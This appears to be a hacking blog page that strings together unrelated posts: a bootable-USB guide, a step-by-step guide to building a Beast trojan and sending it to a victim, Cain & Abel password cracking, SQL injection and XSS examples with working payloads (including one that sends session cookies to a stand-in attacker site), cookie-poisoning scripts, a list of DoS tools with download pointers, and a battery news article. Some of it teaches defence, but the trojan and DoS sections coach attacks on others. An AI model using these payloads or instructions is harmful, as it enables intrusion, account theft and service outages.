How to make bootable USB without any software?

This tutorial will help you in creating a bootable USB drive of Windows Vista and 7 which you can use to install Vista and 7 in any system. It might become very useful when you don't have access to DVD drive.

Step 1: Insert your USB (4GB+ preferable) stick to the system and backup all the data from the USB as we are going to format the USB to make it as bootable.

Step 2: Open elevated Command Prompt. To do this, type in CMD in Start menu search field and hit Ctrl + Shift + Enter. Alternatively, navigate to Start > All programs >Accessories > right click on Command Prompt and select run as administrator.

Step 3: When the Command Prompt opens, enter the following command:

DISKPART and hit enter.

LIST DISK and hit enter.

Once you enter the LIST DISK command, it will show the disk number of your USB drive. In the below image my USB drive disk no is Disk 1.

Step 4: In this step you need to enter all the below commands one by one and hit enter. As these commands are self explanatory, you can easily guess what these commands do.

SELECT DISK 1 (Replace DISK 1 with your disk number)

CLEAN

CREATE PARTITION PRIMARY

SELECT PARTITION 1

ACTIVE

FORMAT FS=NTFS

(Format process may take few seconds)

ASSIGN

EXIT


Step 7: Copy Windows  contents to USB.

You are done with your bootable USB. You can now use this bootable USB as bootable DVD on any computer that comes with USB boot feature (most of the current motherboards support this feature).

(If in case it doesn't work)

Step 8: Insert your Windows DVD in the optical drive and note down the drive letter of the optical drive and USB media. Here I use “F” as my optical (DVD) drive letter and “H” as my USB drive letter.


Step 6: Go back to command prompt and execute the following commands:

F: and hit enter. Where “F” is your DVD drive letter.

CD BOOT and hit enter.

BOOTSECT.EXE/NT60 H:

(Where “H” is your USB drive letter)

if you do not have disk and you want to do this from hard drive of another computer where you have installation stuff then simply change the drive letter to
the one of your hard drive  where you have installation stuff

D:\Boot>BOOTSECT.EXE/NT60 H:
D Is the hard drive letter



Note that this bootable USB guide will not work if you are trying to make a bootable USB on XP computer.

Read More

Hack others computer using Beast trojan

Step 1:- Download the necessary software  Beast 2.07

Step 2:- Open the software

Step 3:- Now click on “Build server “button.

Step 4:- Now in this window click on the notifications tab.
Step 5:- In the notifications tab click on the e-mail button.
Step 6:- Now In this window fill your proper and valid email id

Step 7:- Now go to "AV-FW kill” tab.

Step 8: - Now In this put a tick mark on the “disable XP firewall ".

Step 9:-Now click on "EXE icon” tab.
Step 10:- Select any icon and click on the ”Save Server” button and the Trojan will be made.

 Step 11:-Now send this Trojan File to victim.

Step 12:- As and when the victim will install the Trojan on his system you will get a notification e-mail on your specified e-mail id while making the Trojan. This Email consists of the IP address and port of the victim.

Step 13:-Put This IP address and Port in the place shown in the below snap-shot.

Step 14:- After That Click on the "Go Beast” Button and You will be connected to victims PC.

Step 15:- Now select the action or task you want to execute on victims PC form the given list.

Step 16:- Now to destroy or kill the Trojan click on the “server “tab from the menu.

Step 17:-Now click on the “Kill Server “button and the Trojan will be destroyed from the victims PC.

 Step 18:- You are Done Now.

Read More

How to Hack Computer Password using Cain and Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

First download cain & abel software.

Open cain and abel click on cracker option.

 Select LM & NTLM Hashes and click “+” sign

Click on Next

I want to recover password of “raaz” user name then right click on raaz> Brute Force Attack > NTLM Hashes.

Now you will see window similar to below image. Click on start.

After successfully finished performing password recovery it will show you password like in the image below.

Read More

SQL Injections Attack with Examples

This article explains basics of SQL Injection with an example that shows SQL Injection, and provides methods to prevent from these attacks.

As the name suggests, this attack can be done with SQL queries. Many web developers are unaware of how an attacker can tamper with the SQL queries. SQL-Injection can be done on a web application which doesn’t filter the user inputs properly and trusts whatever the user provides. The idea of SQL injection is to make the application to run undesired SQL queries.

All the examples mentioned in this article are tested with the following:

• PHP 5.3.3-7
• Apache/2.2.16
• Postgresql 8.4

SQL Injection Example

Most of the web application has a login page. So we will start with that. Let us assume the following code was written by the application.

index.html:

<html>
<head><title>SQL Injection Demo</title></head>
 <body onload="document.getElementById('user_name').focus();" >
 <form name="login_form" id="login_form" method="post" action="login.php">
  <table border=0 align="center" >
   <tr>
    <td colspan=5 align="center" ><font face="Century Schoolbook L" > Login Page </font></td>
   </tr>
   <tr>
    <td> User Name:</td><td> <input type="text" size="13" id="user_name" name="user_name" value=""></td>
   </tr>
   <tr>
    <td> Password: </td><td> <input type="password" size="13" id="pass_word" name="pass_word" value=""></td>
   </tr>
   <tr>
    <td colspan=2 align="center"><input type="submit" value="Login"> </div></td>
   </tr>
  </table>
 </form>
</body>
</html>

When the user enters the user_name and pass_word, it will be posted to login.php via HTTP_POST method.

login.php:

<?php
$Host= '192.168.1.8';
$Dbname= 'john';
$User= 'john';
$Password= 'xxx';
$Schema = 'test'; 

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; 

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW); 

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
} 

$query="SELECT * from $Schema.users where user_name='".$_POST['user_name']."' and password='".$_POST['pass_word']."';"; 

$result=pg_query($Connect,$query);
$rows = pg_num_rows($result);
if ($rows) {
 echo "Login Success";
}
else {
 echo "Login Failed";
}
?>

The line number 19 in the above code is vulnerable to SQL-Injection (i.e the line that starts with “$query=”SELECT *..”). The SQL query is designed to match the given username and password with the database. It will work properly if the user provides valid username and password. But an attacker can craft the input as follows:

In username field, instead of providing a username the attcker can enter the following.

' or 1=1;--

The attacker than then leave the password field be empty.

When the attacker clicks submit, the details will be posted to login.php. In login.php the query will be framed as follows:

SELECT * from test.members where user_name='' or 1=1;--' and password='';

The above one is a valid SQL query. In postgresql – is the comment character. So the statements after – will be treated as comments and it will not be executed. Now the postgresql will execute

select * from test.members where user_name='' or 1=1;

This will return true and give “Login Success” message.

If the attacker knows the database tables name, then he can even drop those tables by giving the following input in the username field.

';drop table test.lop;--

Some login application, tends to do the following.

• Stored the password as md5 in the database
• First select the username,password from the database based on the username provided.
• Then md5 the password given by the user, and compare it with the password got from database.
• If both are matched, then login is success.

Let’s see how we can bypass that if the query is vulnerable to SQL-Injection.

login.php:

$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';"; 

$result=pg_query($Connect,$query); 

$row=pg_fetch_array($result,NULL,PGSQL_ASSOC); 

# Find the md5 for the user supplied password.
$user_pass = md5($_POST['pass_word']); 

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login Failed\n";
}
else {
 echo "Login Success\n";
}

Now enter the following in the username field

' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70

Enter “123” in the password field and click submit. md5(123) is 202cb962ac59075b964b07152d234b70

Now the query would expand as follows:

SELECT user_name,password from test.members where user_name='' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70';

When the above query is executed, the database will return ‘laksh’ as the username and ‘ 202cb962ac59075b964b07152d234b70′ as password.

We also posted “123” in the pass_word field. So the strcmp will return 0 and the authentication will be success.

The above are just couple of examples of SQL injection attacks. There are lot of these variations. Following are some of the things you can do to reduce the possibility of SQL-Injection attacks.

• Strict type checking ( Don’t trust what the user enters )
• If you expect user name to be entered, then validate whether it contains only alpha numerals.
• Escape or filter the special characters and user inputs.
• Use prepared statements to execute the queries.
• Don’t allow multiple queries to be executed on a single statement.
• Don’t leak the database information to the end user by displaying the “syntax errors”, etc.

Read More

Cross-site Scripting with Examples

In the previous article of this series, we explained how to prevent from SQL-Injection attacks. In this article we will see a different kind of attack called XXS attacks.

XSS stands for Cross Site Scripting.

XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Types of Cross Site Scripting

XSS attacks are broadly classified into 2 types:

Non-Persistent
Persistent

1. Non-Persistent XSS Attack

In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visit the link, the crafted code will get executed by the user’s browser. Let us understand this attack better with an example.

Example for Non-Persistent XSS

index.php:

<?php
$name = $_GET['name'];
echo "Welcome $name<br>";
echo "<a href="http://xssattackexamples.com/">Click to Download</a>";
?>

Example 1:
Now the attacker will craft an URL as follows and send it to the victim:

index.php?name=guest<script>alert('attacked')</script>

When the victim load the above URL into the browser, he will see an alert box which says ‘attacked’. Even though this example doesn’t do any damage, other than the annoying ‘attacked’ pop-up, you can see how an attacker can use this method to do several damaging things.

Example 2:

For example, the attacker can now try to change the “Target URL” of the link “Click to Download”. Instead of the link going to “xssattackexamples.com” website, he can redirect it to go “not-real-xssattackexamples.com” by crafting the URL as shown below:

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>

In the above, we called the function to execute on “window.onload”. Because the website (i.e index.php) first echos the given name and then only it draws the <a> tag. So if we write directly like the one shown below, it will not work, because those statements will get executed before the <a> tag is echoed

index.php?name=<script>var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com"</script>

Normally an attacker tends not to craft the URL which a human can directly read. So he will encode the ASCII characters to hex as follows.

index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

which is same as

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>

Now the victim may not know what it is, because directly he cannot understand that the URL is crafted and their is a more chance that he can visit the URL.

2. Persistent XSS Attack

In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user’s session by performing XSS.

Session

HTTP protocol is a stateless protocol, which means, it won’t maintain any state with regard to the request and response. All request and response are independent of each other. But most of the web application don’t need this. Once the user has authenticated himself, the web server should not ask the username/password for the next request from the user. To do this, they need to maintain some kind of states between the web-browser and web-server which is done through the “Sessions”.

When the user login for the first time, a session ID will be created by the web server and it will be sent to the web-browser as “cookie”. All the sub-sequent request to the web server, will be based on the “session id” in the cookie.

Examples for Persistent XSS Attack

This sample web application we’ve given below that demonstrates the persistent XSS attack does the following:

There are two types of users: “Admin” and “Normal” user.

• When “Admin” log-in, he can see the list of usernames. 
• When “Normal” users log-in, they can only update their display name.

login.php:

<?php
$Host= '192.168.1.8';
$Dbname= 'app';
$User= 'yyy';
$Password= 'xxx';
$Schema = 'test';

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
}

$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';";

$result=pg_query($Connect,$query);
$row=pg_fetch_array($result,NULL,PGSQL_ASSOC);

$user_pass = md5($_POST['pass_word']);
$user_name = $row['user_name'];

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login failed";
}
else {
 # Start the session
 session_start();
 $_SESSION['USER_NAME'] = $user_name;
 echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>";
}
?>

home.php

<?php
session_start();
if(!$_SESSION['USER_NAME']) {
 echo "Need to login";
}
else {
 $Host= '192.168.1.8';
 $Dbname= 'app';
 $User= 'yyy';
 $Password= 'xxx';
 $Schema = 'test';
 $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
 $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);
 if($_SERVER['REQUEST_METHOD'] == "POST") {
  $query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';";
  pg_query($Connect,$query);
  echo "Update Success";
 }
 else {
  if(strcmp($_SESSION['USER_NAME'],'admin')==0) {
   echo "Welcome admin<br><hr>";
   echo "List of user's are<br>";
   $query = "select display_name from $Schema.members where user_name!='admin'";
   $res = pg_query($Connect,$query);
   while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
    echo "$row[display_name]<br>";
   }
 }
 else {
  echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">";
  echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">";
  echo "<input type=\"submit\" value=\"Update\">";
 }
}
}
?>

Now the attacker log-in as a normal user, and he will enter the following in the textbox as his display name:

<a href=# onclick=\"document.location=\'http://not-real-xssattackexamples.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Name</a>

The above information entered by the attacker will be stored in the database (persistent).

Now, when the admin log-in to the system, he will see a link named “My Name” along with other usernames. When admin clicks the link, it will send the cookie which has the session ID, to the attacker’s site. Now the attacker can post a request by using that session ID to the web server, and he can act like “Admin” until the session is expired. The cookie information will be something like the following:

xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3

Once the hacker knows the PHPSESSID, he can use this session to get the admin privilege until PHPSESSID expires.

To understand this more, we can use a firefox addon called “Tamper Data”, which can be used to add a new HTTP header called “Cookies” and set the value to “PHPSESSID=vmcsjsgear6gsogpu7o2imr9f3″.

Read More

Cookie Poisoning

Web site cookie poisoning came up twice in the last week while testing so I guess now is great time to talk about how to test the for the vulnerability of cookie poisoning. I'm not going to get into the details of how a cookie works but rather how to poison them. If you want details of how they work from a testing point of view read this respectable paper.

Web sites use cookies (a lot of them), cookies can be permanent (on disk) or temporary (in memory), and cookies contain variables; variables that the site cares about, and can be messed with or "poisoned" to get results that the Web site didn't intend to give you. Use the following test page as an example, The test pages are simple, if you have the right cookie content then you will receive a 50% discount; if the content isn't right then you will not receive the 50% discount. The first page sets the cookie with the content of "SpecialOffer=No" indicating that you are not eligible by default. The cookie setting code on this page is simple and looks like this:

<SCRIPT>
document.cookie = "SpecialOffer=No";
</SCRIPT>

Now, if you click the link "Click here to see if you are eligible for 50% discount" you'll see that you are not eligible for the discount. The check on the 2nd page is pretty simple too and looks like this:

<SCRIPT>
var pos = document.cookie.indexOf( "SpecialOffer=Yes" );
if( pos == -1 ) {
document.write("I'm sorry you are NOT eligible for the 50% discount");
}
else {
document.write("You are eligible for the 50% discount");
}
</SCRIPT>

In the above script I look for the value of "SpecialOffer=Yes" in the cookie content and then react accordingly. If I don't see "SpecialOffer=Yes" then you aren't eligible for the discount. Now, on to the fun stuff! How do you make yourself eligible for the discount? To do this we need to change the default cookie content value from "SpecialOffer=No" to "SpecialOffer=Yes". How does one change cookie values? There are quite a few ways but I'll share with you my 3 favorites:

1. Add N Edit Cookies FireFox extension
2. Paros Proxy
3. Paste the following JavaScript in the URL bar to view the cookies:
javascript:alert(document.cookie.split(';').join(' \n'))

and the following to modify it:

javascript:alert(window.c=function a(n,v,nv) {c=document.cookie;c=c.substring(c.indexOf(n) +n.length,c.length);c=c.substring(1,((c.indexOf("; ")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace (v,nv);document.cookie=n+"="+escape(nc);return unescape (document.cookie);});alert(c(prompt("cookie name:",""), prompt("replace this value:",""),prompt("with::","")));

How to poison cookies with Add N Edit Cookies

1. Navigate to http://www.qainsight.net/examples/cookietest.htm in FireFox
2. Click the cookie icon in your FireFox toolbar
3. Find the cookie for www.QAInsight.net and double click it or highlight it and press the edit button
4. Change the content form field from "No" to "Yes" (case sensitive)
5. Go back to the browser and click the link "Click here to see if you are eligible for 50% discount"
6. KaaaaPOW.... You now have the 50% discount! You're a freakin' evil, bad to the bone tester!

How to poison cookies with Paros Proxy
Typically I wouldn't use Paros in this situation because the cookie is being set on the client side (you won't see this too much in the real world). The following example isn't what I consider cookie poisoning but more JavaScript manipulation. The following assumes you have cleared your cache:

1. Turn on Paros and set you IE connection options to use the address of 127.0.0.1 with a port of 8080
2. In Paros click the "Trap" tab and check the "Trap Request" and "Trap Response" checkboxes
3. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
4. Go back to Paros (Trap tab) and press the "continue" button until you see the following text in the bottom pane:
<SCRIPT>
document.cookie = "SpecialOffer=No";
</SCRIPT>
5. Change the "No" to "Yes" in the above line
6. Click the "Continue" button.
7. Go back to IE and click the link "Click here to see if you are eligible for 50% discount"
8. Whoot! You now have the 50% discount! You're one sexy cool tester with a severity 1 defect that needs to be submitted.

There are situations where you will want to change the cookie value in the header (the top pane in the trap tab) on the response or the request, this is when you would use Paros over Add n Edit Cookies. Situations where you would need to manipulate the cookie before the response is rendered or before the request is sent due to the server or client side code manipulating the cookie.

How to poison cookies with JavaScript

1. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
2. To view the set cookie, type the following in the URL bar:
javascript:alert(document.cookie.split(';').join(' \n'))
3. You will see "SpecialOffer=No". Click Ok
4. Copy and paste the following JavaScript in the browser URL bar:
javascript:alert(window.c=function a(n,v,nv) {c=document.cookie;c=c.substring(c.indexOf(n) +n.length,c.length);c= c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length)); nc=unescape(c).replace(v,nv); document.cookie= n+"="+escape(nc);return unescape(document.cookie);}); alert(c(prompt("cookie name:",""), prompt("replace this value:",""), prompt("with::","")));
5. Hit the enter key
6. Click the Ok button at the JavaScript Alert
7. Type the cookie name of SpecialOffer in the Alert box and click the Ok button
8. At the "replace this value" script prompt type No and press the Ok button
9. At the "with:" script prompt type Yes (case sensitive) and press the Ok button
10. The next alert will show you the replaced cookie. You should see: SpecialOffer=Yes
11. Click the Ok button
12. In IE click the link "Click here to see if you are eligible for 50% discount"
13. DingDingDingDing.... You're a winner! You now have the 50% discount! You're quite the bad-ass tester aren't you? You're like the wicked witch in Snow White but instead of poisoning apples you poison cookies.

And that's how I conduct cookie poisoning when testing. Not too awful tough eh? Oh...if I ever get confused about the state of cookies before and after poisoning I use HTTPWatch to get a better idea of what is going on. I can usually get the gist of it by looking through the cookie and header tabs.

When do you test for the cookie poisoning vulnerability you ask? Whenever there is a cookie being used! Is it a defect if you can manipulate the cookie? Not necessarily. They typically are defects when a cookie is being placed that impacts or restricts the site's behavior and you can exploit that feature. If you manipulate a cookie and it doesn't gain you anything or exploit a feature then it's not of much value, thus not a defect. But...it's important that you know what the cookie you are poisoning does, without knowing what the cookie does you may be poisoning something and may not be seeing that exploit. To prevent guess-work it's easiest if you work with your developer to understand what he/she is doing with cookies on the site so you can go straight for the kill.

Happy poisoning!

Read More

Denial-of-Service (DoS) Attack and Free DoS Attacking Tools

The denial of service (DOS) attack is one of the most powerful attacks used by hackers to harm a company or organization. Don’t confuse a DOS attack with DOS, the disc operating system developed by Microsoft. This attack is one of most dangerous cyber attacks. It causes service outages and the loss of millions, depending on the duration of attack. In past few years, the use of the attack has increased due to the availability of free tools. This tool can be blocked easily by having a good firewall. But a widespread and clever DOS attack can bypass most of the restrictions. In this post, we will see more about the DOS attack, its variants, and the tools that are used to perform the attack. We will also see how to prevent this attack and how not to be the part of this attack.

What Is a Denial of Service Attack?

A DOS attack is an attempt to make a system or server unavailable for legitimate users and, finally, to take the service down. This is achieved by flooding the server’s request queue with fake requests. After this, server will not be able to handle the requests of legitimate users.

In general, there are two forms of the DOS attack. The first form is on that can crash a server. The second form of DOS attack only floods a service.


DDOS or Distributed Denial of Service Attack

This is the complicated but powerful version of DOS attack in which many attacking systems are involved. In DDOS attacks, many computers start performing DOS attacks on the same target server. As the DOS attack is distributed over large group of computers, it is known as a distributed denial of service attack.

To perform a DDOS attack, attackers use a zombie network, which is a group of infected computers on which the attacker has silently installed the DOS attacking tool. Whenever he wants to perform DDOS, he can use all the computers of ZOMBIE network to perform the attack.

In simple words, when a server system is being flooded from fake requests coming from multiple sources (potentially hundreds of thousands), it is known as a DDOS attack. In this case, blocking a single or few IP address does not work. The more members in the zombie network, more powerful the attack it. For creating the zombie network, hackers generally use a Trojan.

There are basically three types of DDOS attacks:

Application-layer DDOS attack
Protocol DOS attack
Volume-based DDOS attack

Application layer DDOS attack: Application-layer DDOS attacks are attacks that target Windows, Apache, OpenBSD, or other software vulnerabilities to perform the attack and crash the server.

Protocol DDOS attack: A protocol DDOS attacks is a DOS attack on the protocol level. This category includes Synflood, Ping of Death, and more.

Volume-based DDOS attack: This type of attack includes ICMP floods, UDP floods, and other kind of floods performed via spoofed packets.

There are many tools available for free that can be used to flood a server and perform an attack. A few tools also support a zombie network to perform DDOS attacks. For this post, we have compiled a few freely available DOS attacking tools.

Free DOS Attacking Tools

1. LOIC (Low Orbit Ion Canon)

LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.

It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.

You can see the snapshot of the tool above. Enter the URL or IP address and then select the attack parameters. If you are not sure, you can leave the defaults. When you are done with everything, click on the big button saying “IMMA CHARGIN MAH LAZER” and it will start attacking on the target server. In a few seconds, you will see that the website has stopped responding to your requests.

This tool also has a HIVEMIND mode. It lets attacker control remote LOIC systems to perform a DDOS attack. This feature is used to control all other computers in your zombie network. This tool can be used for both DOS attacks and DDOS attacks against any website or server.

The most important thing you should know is that LOIC does nothing to hide your IP address. If you are planning to use LOIC to perform a DOS attack, think again. Using a proxy will not help you because it will hit the proxy server not the target server. So using this tool against a server can create a trouble for you.

Download LOIC


2. XOIC

XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways. Like LOIC, it comes with an easy-to-use GUI, so a beginner can easily use this tool to perform attacks on other websites or servers.

In general, the tool comes with three attacking modes. The first one, known as test mode, is very basic. The second is normal DOS attack mode. The last one is a DOS attack mode that comes with a TCP/HTTP/UDP/ICMP Message.

It is an effective tool and can be used against small websites. Never try it against your own website. You may end up crashing your own website’s server.

Download XOIC

3. HULK (HTTP Unbearable Load King)

HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.

It has a list of known user agents to use randomly with requests. It also uses referrer forgery and it can bypass caching engines, thus it directly hits the server’s resource pool.

The developer of the tool tested it on an IIS 7 web server with 4 GB RAM. This tool brought the server down in under one minute.

Download HULK


4. DDOSIM—Layer 7 DDOS Simulator

DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.

This tool is written in C++ and runs on Linux systems.

These are main features of DDOSIM

Simulates several zombies in attack
Random IP addresses
TCP-connection-based attacks
Application-layer DDOS attacks
HTTP DDoS with valid requests
HTTP DDoS with invalid requests (similar to a DC++ attack)
SMTP DDoS
TCP connection flood on random port
Download DDOSIM here

Read more about this tool here

5. R-U-Dead-Yet

R-U-Dead-Yet is a HTTP post DOS attack tool. For short, it is also known as RUDY. It performs a DOS attack with a long form field submission via the POST method. This tool comes with an interactive console menu. It detects forms on a given URL and lets users select which forms and fields should be used for a POST-based DOS attack.

Download RUDY

6. Tor’s Hammer

Tor’s Hammer is another nice DOS testing tool. It is a slow post tool written in Python. This tool has an extra advantage: It can be run through a TOR network to be anonymous while performing the attack. It is an effective tool that can kill Apache or IIS servers in few seconds.

Download TOR’s Hammer here

7. PyLoris

PyLoris is said to be a testing tool for servers. It can be used to perform DOS attacks on a service. This tool can utilize SOCKS proxies and SSL connections to perform a DOS attack on a server. It can target various protocols, including HTTP, FTP, SMTP, IMAP, and Telnet. The latest version of the tool comes with a simple and easy-to-use GUI. Unlike other traditional DOS attacking tools, this tool directly hits the service.

Download PyLoris

8. OWASP DOS HTTP POST

It is another nice tool to perform DOS attacks. You can use this tool to check whether your web server is able to defend DOS attack or not. Not only for defense, it can also be used to perform DOS attacks against a website.

Download here

9. DAVOSET

DAVOSET is yet another nice tool for performing DDOS attacks. The latest version of the tool has added support for cookies along with many other features. You can download DAVOSET for free from Packetstormsecurity.

Download DavoSET

10. GoldenEye HTTP Denial Of Service Tool

GoldenEye is also a simple but effective DOS attacking tool. It was developed in Python for testing DOS attacks, but people also use it as hacking tool.

Download GoldenEye

Read More

Common methods to hack a website

Gone are the days when website hacking was a sophisticated art. Today any body can access through the Internet and start hacking your website. All that is needed is doing a search on google with keywords like “how to hack website”, “hack into a website”, “Hacking a website” etc. The following article is not an effort to teach you website hacking, but it has more to do with raising awareness on some common website hacking methods.

The Simple SQL Injection Hack

SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application. 

When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.

In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.

Cross site scripting ( XSS ): 

Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a website to gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users so they could place the necessary security systems to block cross-site scripting on their website.

If you wanna know more about Cross-site Scripting, you can view the my other post of Cross-site Scripting with example.

Denial of service ( Ddos attack ):

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website. If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking.

For more information on DDoS Attack, click here to view the article

Cookie Poisoning: 

Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection Both have 'OR'1'='1 or maybe '1'='1' But in cookie poisoning you begin with alerting your cookies Javascript:alert(document.cookie) 

Then you will perharps see 

"username=JohnDoe" and "password=iloveJaneDoe"

in this case the cookie poisoning could be: 

Javascript:void(document.cookie="username='OR'1'='1"); 

void(document.cookie="password='OR'1'='1");

View more on Cookie Poisoning

Password Cracking: 

Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it. You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.

Read More

First nonflammable lithium-ion battery will stop your smartphone, car, and plane from exploding

Lithium-ion batteries, despite being one of the most important pieces of modern technology, have always had a particularly grievous flaw: they’re highly flammable. If you puncture a lithium-ion battery, or you charge and discharge them improperly, you’ll usually have a pretty bad fire on your hands — or worse, if the conditions are just right, an explosion. Most notably, the Boeing 787 Dreamliner was grounded in 2013 due to its lithium-ion battery packs causing electrical fires mid-flight, but there have also been a fair number of stories about exploding smartphone batteries recently. Now, long overdue, researchers at the University of North Carolina at Chapel Hill say they’ve built a nonflammable lithium-ion battery.

Lithium-ion batteries (LIBs) are prone to be incendiary and explosive for two reasons: because they’re pressurized, and because their electrolyte — the charge-carrying liquid that sits between the positive and negative electrodes — is flammable. The electrolyte in an LIB is nearly always a lithium salt dissolved in an organic solvent, and most of these solvents are highly flammable. Because of these factors, LIBs are generally manufactured to a very high level of quality, but that doesn’t help you if the battery is somehow pierced (as in the Tesla Model S battery pack that was impaled and burst into flames), or if thermal runaway occurs.

Now, if you mutilate an LIB or throw it haphazardly in the trash, you’re asking for trouble. (Always recycle your batteries!) Thermal runaway, however, is a much trickier problem that’s inherent to LIB tech, and which you can’t do a whole lot about. Basically, in the process of charging or discharging a lithium-ion battery, it warms up. This is just the battery chemistry in action, and is completely normal. If it discharges too quickly, though, or you overcharge it, you can rupture one of the battery’s cells. This rupture can then cascade down the line of cells, potentially causing a fire or explosion. This is why the peak power draw from LIBs is fairly low, and why there has been some discussion about whether LIBs are the right technology for high-power applications, such as electric vehicles and grid power storage.

The most common cause of LIB thermal runaway is likely faulty charging circuits. The battery itself could be suffering from a manufacturing fault, too. When the cells rupture in some cases, an LIB will just swell up rather than explode. We still don’t know what caused the Dreamliner battery fires, but it’s probably just a case of Boeing underestimating peak draw, or an inherently faulty battery design (it uses just a few big cells which are prone to cascading failure, rather than Tesla’s approach, which uses lots of smaller cells).



The University of North Carolina’s breakthrough is to replace the electrolyte’s flammable organic solvent with nonflammable perfluoropolyether (PFPE). PFPE is usually used as an industrial lubricant, and the lead researcher – Joseph DeSimone — had originally been looking at using PFPE on the bottom of ships to prevent marine life from sticking, which is a serious problem in the world of shipping. He realized that PFPE had a similar structure to another solvent used in LIBs, so he did what any sensible chemist would do: tried dissolving a lithium salt in PFPE to see what would happen. As luck would have it, it worked just fine. He created a nonflammable lithium-ion battery.

